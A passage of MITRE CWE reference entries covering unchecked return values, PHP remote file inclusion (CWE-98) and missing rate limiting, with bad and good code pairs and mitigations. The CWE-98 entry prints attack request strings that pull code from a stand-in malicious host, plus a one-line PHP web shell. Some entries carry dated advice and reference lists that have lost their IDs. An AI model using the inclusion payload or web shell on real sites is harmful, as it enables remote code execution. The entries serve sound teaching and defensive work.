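fclose($fh);
if (strlen($data) !== $expected) {
    exit("Short read: got " . strlen($data) . " of $expected bytes");
}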

Example 7

This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.

(Bad Code)
Example Language: C 
void host_lookup(char *user_supplied_addr){
struct hostent *hp;
in_addr_t addr;
char hostname[64];

/* routine that ensures user_supplied_addr is in the right format for conversion */
validate_addr_form(user_supplied_addr);
addr = inet_addr(user_supplied_addr);
hp = gethostbyaddr(&addr, sizeof(struct in_addr), AF_INET);
strcpy(hostname, hp->h_name);
}

If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. When this occurs, a NULL pointer dereference (CWE-476) will occur in the call to strcpy().

Note that this example is also vulnerable to a buffer overflow (see CWE-119).

Example 8

In the following C/C++ example the method outputStringToFile opens a file in the local filesystem and outputs a string to the file. The input parameters output and filename contain the string to output to the file and the name of the file respectively.

(Bad Code)
Example Language: C++ 
int outputStringToFile(char *output, char *filename) {

openFileToWrite(filename);
writeToFile(output);
closeFile(filename);
return SUCCESS;
}

However, this code does not check the return values of the methods openFileToWrite, writeToFile, and closeFile to verify that the file was properly opened and closed and that the string was successfully written to it. The return values of these methods should be checked to determine whether each call succeeded, allowing errors or unexpected conditions to be detected, as in the following example.

(Good Code)
Example Language: C++ 
int outputStringToFile(char *output, char *filename) {
int isOutput = SUCCESS;

int isOpen = openFileToWrite(filename);
if (isOpen == FAIL) {
printf("Unable to open file %s", filename);
isOutput = FAIL;
}
else {
int isWrite = writeToFile(output);
if (isWrite == FAIL) {
printf("Unable to write to file %s", filename);
isOutput = FAIL;
}

int isClose = closeFile(filename);
if (isClose == FAIL)
isOutput = FAIL;
}
return isOutput;
}

Example 9

In the following Java example the method readFromFile uses a FileReader object to read the contents of a file. The FileReader object is created using the File object readFile, which is initialized by the setInputFile method. The setInputFile method should be called before calling the readFromFile method.

(Bad Code)
Example Language: Java 
private File readFile = null;

public void setInputFile(String inputFile) {
// create readFile File object from string containing name of file
}

public void readFromFile() {
try {
FileReader reader = new FileReader(readFile);

// read input file

} catch (FileNotFoundException ex) {...}
}

However, the readFromFile method does not check whether the readFile object is null, i.e., has not been initialized, before creating the FileReader object and reading from the input file. The readFromFile method should verify whether the readFile object is null, and if so output an error message and raise an exception, as in the following code.

(Good Code)
Example Language: Java 
private File readFile = null;

public void setInputFile(String inputFile) {
// create readFile File object from string containing name of file
}

public void readFromFile() {
try {
if (readFile == null) {
System.err.println("Input file has not been set; call setInputFile before calling readFromFile");
throw new NullPointerException();
}

FileReader reader = new FileReader(readFile);

// read input file

} catch (FileNotFoundException ex) {...}
catch (NullPointerException ex) {...}
}
+ Observed Examples
ReferenceDescription
Unchecked return value leads to resultant integer overflow and code execution.
Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.
Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.
+ Potential Mitigations

Phase: Requirements

Strategy: Language Selection

Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Choose languages with features such as exception handling that force the programmer to anticipate unusual conditions that may generate exceptions. Custom exceptions may need to be developed to handle unusual business-logic conditions. Be careful not to pass sensitive exceptions back to the user (CWE-209, CWE-248).

Phase: Implementation

Check the results of all functions that return a value and verify that the value is expected.

Effectiveness: High

Checking the return value of the function will typically be sufficient; however, beware of race conditions (CWE-362) in a concurrent environment.
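
Many PHP library functions follow the convention of returning false on failure, so this mitigation often reduces to a strict comparison against false. A small sketch (the paths are illustrative):

(Good Code)
Example Language: PHP 
// Sketch: check every return value that can signal failure, using === for strict comparison.
if (rename('/tmp/report.tmp', '/tmp/report.csv') === false) {
    error_log("Unable to move report into place");
    // handle the failure instead of silently continuing
}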

Phase: Implementation

If using exception handling, catch and throw specific exceptions instead of overly-general exceptions (CWE-396, CWE-397). Catch and handle exceptions as locally as possible so that exceptions do not propagate too far up the call stack (CWE-705). Avoid unchecked or uncaught exceptions where feasible (CWE-248).

Effectiveness: High

Using specific exceptions, and ensuring that exceptions are checked, helps programmers to anticipate and appropriately handle many unusual events that could occur.

Phase: Implementation

Ensure that error messages only contain minimal details that are useful to the intended audience, and nobody else. The messages need to strike the balance between being too cryptic and not being cryptic enough. They should not necessarily reveal the methods that were used to determine the error. Such detailed information can be used to refine the original attack to increase the chances of success.

If errors must be tracked in some detail, capture them in log messages - but consider what could occur if the log messages can be viewed by attackers. Avoid recording highly sensitive information such as passwords in any form. Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a username is valid or not.

Exposing additional information to a potential attacker in the context of an exceptional condition can help the attacker determine what attack vectors are most likely to succeed beyond DoS.

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

Performing extensive input validation does not help with handling unusual conditions, but it will minimize their occurrences and will make it more difficult for attackers to trigger them.

Phases: Architecture and Design; Implementation

If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery.

Phase: Architecture and Design

Use system limits, which should help to prevent resource exhaustion. However, the software should still handle low resource conditions since they may still occur.

+ Background Details

Many functions return a value that indicates whether their action succeeded. Checking this value alerts the program to whether it needs to handle any errors caused by that function.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory388Error Handling
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfWeakness ClassWeakness Class703Improper Check or Handling of Exceptional Conditions
Development Concepts (primary)699
Research Concepts (primary)1000
ChildOfCategoryCategory742CERT C Secure Coding Section 08 - Memory Management (MEM)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory8022010 Top 25 - Risky Resource Management
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory840Business Logic Errors
Development Concepts699
ChildOfCategoryCategory8672011 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory876CERT C++ Secure Coding Section 08 - Memory Management (MEM)
Weaknesses Addressed by the CERT C++ Secure Coding Standard868
ChildOfCategoryCategory880CERT C++ Secure Coding Section 12 - Exceptions and Error Handling (ERR)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory962SFP Secondary Cluster: Unchecked Status Condition
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfWeakness BaseWeakness Base252Unchecked Return Value
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base253Incorrect Check of Function Return Value
Research Concepts1000
ParentOfWeakness BaseWeakness Base273Improper Check for Dropped Privileges
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base354Improper Validation of Integrity Check Value
Research Concepts1000
ParentOfWeakness BaseWeakness Base394Unexpected Status Code or Return Value
Research Concepts (primary)1000
+ Relationship Notes

Sometimes, when a return value can be used to indicate an error, an unchecked return value is a code-layer instance of a missing application-layer check for exceptional conditions. However, return values are not always needed to communicate exceptional conditions. For example, expiration of resources, values passed by reference, asynchronously modified data, sockets, etc. may indicate exceptional conditions without the use of a return value.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
CERT C++ Secure CodingMEM32-CPPDetect and handle memory allocation errors
CERT C++ Secure CodingERR39-CPPGuarantee exception safety
CERT C Secure CodingMEM32-CDetect and handle memory allocation errors
+ References
[REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 7, "Program Building Blocks" Page 341. 1st Edition. Addison Wesley. 2006.
[REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 1, "Exceptional Conditions," Page 22. 1st Edition. Addison Wesley. 2006.
[REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 11: Failure to Handle Errors Correctly." Page 183. McGraw-Hill. 2010.
Frank Kim. "Top 25 Series - Rank 15 - Improper Check for Unusual or Exceptional Conditions". SANS Software Security Institute. 2010-03-15. <http://blogs.sans.org/appsecstreetfighter/2010/03/15/top-25-series-rank-15-improper-check-for-unusual-or-exceptional-conditions/>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
2009-03-03Internal CWE Team
New entry for reorganization of CWE-703.
Modifications
Modification DateModifierOrganizationSource
2009-07-27CWE Content TeamMITREInternal
updated Relationships
2009-12-28CWE Content TeamMITREInternal
updated Applicable_Platforms, Likelihood_of_Exploit, Time_of_Introduction
2010-02-16CWE Content TeamMITREInternal
updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships
2010-04-05CWE Content TeamMITREInternal
updated Demonstrative_Examples, Related_Attack_Patterns
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Detection_Factors, Potential_Mitigations, References
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Relationship_Notes
2011-03-29CWE Content TeamMITREInternal
updated Description, Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Common_Consequences, Related_Attack_Patterns, Relationships
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-02-21CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Demonstrative_Examples, Relationships
2015-12-07CWE Content TeamMITREInternal
updated Relationships
2017-01-19CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2010-02-16Improper Check for Exceptional Conditions

CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')

Weakness ID: 98
Abstraction: Base
Status: Draft
+ Description

Description Summary

The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions.

Extended Description

In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the software will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP.

+ Alternate Terms
Remote file include
RFI:

The Remote File Inclusion (RFI) acronym is often used by vulnerability researchers.

Local file inclusion:

This term is frequently used in cases in which remote download is disabled, or when the first part of the filename is not under the attacker's control, which forces use of relative path traversal (CWE-23) attack techniques to access files that may contain previously-injected PHP code, such as web access logs.

+ Time of Introduction
  • Implementation
  • Architecture and Design
+ Applicable Platforms

Languages

PHP: (Often)

+ Common Consequences
ScopeEffect
Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

The attacker may be able to specify arbitrary code to be executed from a remote location. Alternatively, it may be possible to use normal program behavior to insert PHP code into files on the local machine, which can then be included to force that code to execute, since PHP ignores everything in the file except for the content between PHP start and end tags.

+ Likelihood of Exploit

High to Very High

+ Detection Methods

Manual Analysis

Manual white-box analysis can be very effective for finding this issue, since there is typically a relatively small number of include or require statements in each program.

Effectiveness: High

Automated Static Analysis

The external control or influence of filenames can often be detected using automated static analysis that models data flow within the software.

Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes. If the program uses a customized input validation library, then some tools may allow the analyst to create custom signatures to detect usage of those routines.

+ Demonstrative Examples

Example 1

The following code attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.

victim.php

(Bad Code)
Example Language: PHP 
$dir = $_GET['module_name'];
include($dir . "/function.php");

The problem with the above code is that the value of $dir is not restricted in any way, and a malicious user could manipulate the 'module_name' parameter to force inclusion of an unanticipated file. For example, an attacker could request the above PHP page (victim.php) with a 'module_name' of "http://malicious.example.com" by using the following request string:

(Attack)
 
victim.php?module_name=http://malicious.example.com

Upon receiving this request, the code would set 'module_name' to the value "http://malicious.example.com" and would attempt to include http://malicious.example.com/function.php, along with any malicious code it contains.

For the sake of this example, assume that the malicious version of function.php looks like the following:

(Bad Code)
 
system($_GET['cmd']);

An attacker could now go a step further in our example and provide a request string as follows:

(Attack)
 
victim.php?module_name=http://malicious.example.com&cmd=/bin/ls%20-l

The code will attempt to include the malicious function.php file from the remote site. In turn, this file executes the command specified in the 'cmd' parameter from the query string. The end result is an attempt by victim.php to execute the potentially malicious command, in this case:

(Attack)
 
/bin/ls -l

Note that the above PHP example can be mitigated by setting allow_url_fopen to false, although this will not fully protect the code. See potential mitigations.

+ Observed Examples
ReferenceDescription
Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.
Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.
Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.
Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.
Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.
Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.
Modification of assumed-immutable variable in configuration script leads to file inclusion.
PHP file inclusion.
PHP file inclusion.
PHP file inclusion.
PHP local file inclusion.
PHP remote file include.
PHP remote file include.
PHP remote file include.
PHP remote file include.
PHP remote file include.
Directory traversal vulnerability in PHP include statement.
Directory traversal vulnerability in PHP include statement.
PHP file inclusion issue, both remote and local; local include uses ".." and "%00" characters as a manipulation, but many remote file inclusion issues probably have this vector.
chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal.
+ Potential Mitigations

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Phase: Architecture and Design

Strategy: Enforcement by Conversion

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [R.98.1] provide this capability.
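
A minimal PHP sketch of this enforcement-by-conversion approach for an include scenario such as the one in this entry (the map contents and parameter name are illustrative):

(Good Code)
Example Language: PHP 
// Sketch: map fixed numeric IDs to known files and reject everything else.
$modules = array(
    1 => 'inbox.php',
    2 => 'profile.php',
);
$id = isset($_GET['module_id']) ? (int) $_GET['module_id'] : 0;
if (!isset($modules[$id])) {
    exit("Unknown module");
}
include __DIR__ . '/modules/' . $modules[$id];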

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phases: Architecture and Design; Operation

Strategy: Sandbox or Jail

Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

Effectiveness: Limited

The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.98.2]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When validating filenames, use stringent whitelists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a whitelist of allowable file extensions, which will help to avoid CWE-434.

Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a blacklist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
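
Applied to the earlier victim.php example, a stringent whitelist might accept only module names made of letters, digits, and underscores before the include path is built; a sketch:

(Good Code)
Example Language: PHP 
// Sketch: whitelist-validate the module name before using it in an include path.
$dir = isset($_GET['module_name']) ? $_GET['module_name'] : '';
if (!preg_match('/^[A-Za-z0-9_]+$/', $dir)) {
    exit("Invalid module name");
}
include __DIR__ . '/modules/' . $dir . '/function.php';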

Phases: Architecture and Design; Operation

Strategy: Identify and Reduce Attack Surface

Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.

This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface.
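
One common realization of the fixed-constant technique described above is sketched below; the constant name and file layout are arbitrary.

(Good Code)
Example Language: PHP 
// main.php - the calling program defines a marker constant before including library code.
define('IN_APPLICATION', true);
include __DIR__ . '/lib/helpers.php';

// lib/helpers.php - the include file refuses to run when requested directly.
if (!defined('IN_APPLICATION')) {
    exit("Direct access not permitted");
}
// ... library functions follow ...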

Phases: Architecture and Design; Implementation

Strategy: Identify and Reduce Attack Surface

Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.

Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components.

Phase: Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.

Effectiveness: Moderate

An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization.

Phases: Operation; Implementation

Strategy: Environment Hardening

Develop and run your code in the most recent versions of PHP available, preferably PHP 6 or later. Many of the highly risky features in earlier PHP interpreters have been removed, restricted, or disabled by default.

Phases: Operation; Implementation

Strategy: Environment Hardening

When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

Often, programmers do not protect direct access to files intended only to be included by core programs. These include files may assume that critical variables have already been initialized by the calling program. As a result, the use of register_globals combined with the ability to directly access the include file may allow attackers to conduct file inclusion attacks. This remains an extremely common pattern as of 2009.

Phase: Operation

Strategy: Environment Hardening

Set allow_url_fopen to false, which limits the ability to include files from remote locations.

Effectiveness: High

Be aware that some versions of PHP will still accept ftp:// and other URI schemes. In addition, this setting does not protect the code from path traversal attacks (CWE-22), which are frequently successful against the same vulnerable code that allows remote file inclusion.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory632Weaknesses that Affect Files or Directories
Resource-specific Weaknesses (primary)631
ChildOfWeakness ClassWeakness Class706Use of Incorrectly-Resolved Name or Reference
Research Concepts1000
ChildOfCategoryCategory714OWASP Top Ten 2007 Category A3 - Malicious File Execution
Weaknesses in OWASP Top Ten (2007) (primary)629
ChildOfCategoryCategory727OWASP Top Ten 2004 Category A6 - Injection Flaws
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory8022010 Top 25 - Risky Resource Management
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfWeakness ClassWeakness Class829Inclusion of Functionality from Untrusted Control Sphere
Development Concepts (primary)699
Research Concepts (primary)1000
CanPrecedeWeakness ClassWeakness Class94Improper Control of Generation of Code ('Code Injection')
Development Concepts699
Research Concepts1000
PeerOfWeakness ClassWeakness Class216Containment Errors (Container Errors)
Research Concepts1000
CanAlsoBeCompound Element: CompositeCompound Element: Composite426Untrusted Search Path
Research Concepts1000
CanFollowWeakness ClassWeakness Class73External Control of File Name or Path
Research Concepts1000
CanFollowWeakness BaseWeakness Base184Incomplete Blacklist
Research Concepts1000
CanFollowWeakness BaseWeakness Base425Direct Request ('Forced Browsing')
Research Concepts1000
CanFollowWeakness BaseWeakness Base456Missing Initialization of a Variable
Research Concepts1000
CanFollowWeakness VariantWeakness Variant473PHP External Variable Modification
Research Concepts1000
+ Relationship Notes

This is frequently a functional consequence of other weaknesses. It is usually multi-factor with other factors (e.g., modification of assumed-immutable data, or MAID), although not all inclusion bugs involve assumed-immutable data. Direct request weaknesses frequently play a role.

Can overlap directory traversal in local inclusion problems.

+ Research Gaps

Under-researched and under-reported. Other interpreted languages with "require" and "include" functionality could also produce vulnerable applications, but as of 2007, PHP has been the focus. Any web-accessible language that uses executable file extensions is likely to have this type of issue, such as ASP, since .asp extensions are typically executable. Languages such as Perl are less likely to exhibit these problems because the .pl extension isn't always configured to be executable by the web server.

+ Affected Resources
  • File/Directory
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERPHP File Include
OWASP Top Ten 2007A3CWE More SpecificMalicious File Execution
WASC5Remote File Inclusion
+ References
[R.98.1] [REF-32] OWASP. "Testing for Path Traversal (OWASP-AZ-001)". <http://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)>.
[R.98.2] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
[REF-12] Shaun Clowes. "A Study in Scarlet". <http://www.cgisecurity.com/lib/studyinscarlet.txt>.
[REF-13] Stefan Esser. "Suhosin". <http://www.hardened-php.net/suhosin/>.
Johannes Ullrich. "Top 25 Series - Rank 13 - PHP File Inclusion". SANS Software Security Institute. 2010-03-11. <http://blogs.sans.org/appsecstreetfighter/2010/03/11/top-25-series-rank-13-php-file-inclusion/>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Relationship_Notes, Research_Gaps, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Relationships
2009-03-10CWE Content TeamMITREInternal
updated Relationships
2009-05-27CWE Content TeamMITREInternal
updated Description, Name
2009-12-28CWE Content TeamMITREInternal
updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, Potential_Mitigations, Time_of_Introduction
2010-02-16
(Critical)
CWE Content TeamMITREInternal
converted from Compound_Element to Weakness
2010-02-16CWE Content TeamMITREInternal
updated Alternate_Terms, Common_Consequences, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Type
2010-06-21CWE Content TeamMITREInternal
updated Potential_Mitigations, References
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations, References
2013-02-21CWE Content TeamMITREInternal
updated Alternate_Terms, Name, Observed_Examples
2017-01-19CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11PHP File Inclusion
2009-05-27Insufficient Control of Filename for Include/Require Statement in PHP Program (aka 'PHP File Inclusion')
2013-02-21Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')

CWE-799: Improper Control of Interaction Frequency

Weakness ID: 799
Abstraction: Class
Status: Incomplete
+ Description

Description Summary

The software does not properly limit the number or frequency of interactions that it has with an actor, such as the number of incoming requests.

Extended Description

This can allow the actor to perform actions more frequently than expected. The actor could be a human or an automated process such as a virus or bot. This could be used to cause a denial of service, compromise program logic (such as limiting humans to a single vote), or other consequences. For example, an authentication routine might not limit the number of times an attacker can guess a password. Or, a web site might conduct a poll but only expect humans to vote a maximum of once a day.
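
As a rough illustration in a web context, a per-session attempt counter might look like the following PHP sketch; the limit, session key, and checkCredentials() helper are assumptions. Note that a per-session counter alone is easy to bypass by discarding the session cookie, so real deployments typically also track attempts per account or per source address.

(Good Code)
Example Language: PHP 
// Sketch: limit the number of login attempts allowed in one session.
session_start();
$maxAttempts = 5;
if (!isset($_SESSION['login_attempts'])) {
    $_SESSION['login_attempts'] = 0;
}
if ($_SESSION['login_attempts'] >= $maxAttempts) {
    http_response_code(429);
    exit("Too many login attempts; try again later");
}
$_SESSION['login_attempts']++;
if (isset($_POST['username'], $_POST['password'])
        && checkCredentials($_POST['username'], $_POST['password'])) {   // hypothetical helper
    $_SESSION['login_attempts'] = 0;                                     // reset on success
    // ... proceed with the authenticated session ...
}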

+ Alternate Terms
Insufficient anti-automation:

The term "insufficient anti-automation" focuses primarly on non-human actors such as viruses or bots, but the scope of this CWE entry is broader.

Brute force:

Vulnerabilities that can be targeted using brute force attacks are often symptomatic of this weakness.

+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
+ Applicable Platforms

Languages

Language-independent

+ Common Consequences
ScopeEffect
Availability
Access Control
Other

Technical Impact: DoS: resource consumption (other); Bypass protection mechanism; Other

+ Demonstrative Examples

Example 1

In the following code, a username and password are read from a socket and an attempt is made to authenticate them. The code continuously checks the socket for a username and password until authentication succeeds.

(Bad Code)
Example Languages: C and C++ 
char username[USERNAME_SIZE];
char password[PASSWORD_SIZE];
int isValidUser = 0;

while (isValidUser == 0) {
if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {
if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) {
isValidUser = AuthenticateUser(username, password);
}
}
}
return(SUCCESS);

This code does not place any restriction on the number of authentication attempts. To help prevent brute force attacks, the number of attempts should be limited, as in the following example code.

(Good Code)
Example Languages: C and C++ 
int count = 0;
while ((isValidUser == 0) && (count < MAX_ATTEMPTS)) {
if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {
if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) {
isValidUser = AuthenticateUser(username, password);
}
}
count++;
}
if (isValidUser) {
return(SUCCESS);
}
else {
return(FAIL);
}
+ Observed Examples
ReferenceDescription
Mail server allows attackers to prevent other users from accessing mail by sending large number of rapid requests.
+ Weakness Ordinalities
OrdinalityDescription
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory438Behavioral Problems
Development Concepts (primary)699
ChildOfWeakness ClassWeakness Class691Insufficient Control Flow Management
Research Concepts (primary)1000
ChildOfCategoryCategory8082010 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory840Business Logic Errors
Development Concepts699
ParentOfWeakness BaseWeakness Base307Improper Restriction of Excessive Authentication Attempts
Research Concepts1000
ParentOfWeakness BaseWeakness Base837Improper Enforcement of a Single, Unique Action
Development Concepts (primary)699
Research Concepts (primary)1000
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
WASC21Insufficient Anti-Automation
+ References
Web Application Security Consortium. "Insufficient Anti-automation". <http://projects.webappsec.org/Insufficient+Anti-automation>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
2010-01-15MITREInternal CWE Team
New entry to handle anti-automation as identified in WASC.
Modifications
Modification DateModifierOrganizationSource
2010-04-05CWE Content TeamMITREInternal
updated Demonstrative_Examples
2011-03-29CWE Content TeamMITREInternal
updated Observed_Examples, Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences

CWE-212: Improper Cross-boundary Removal of Sensitive Data

Weakness ID: 212
Abstraction: Base
Status: Incomplete
+ Description

Description Summary

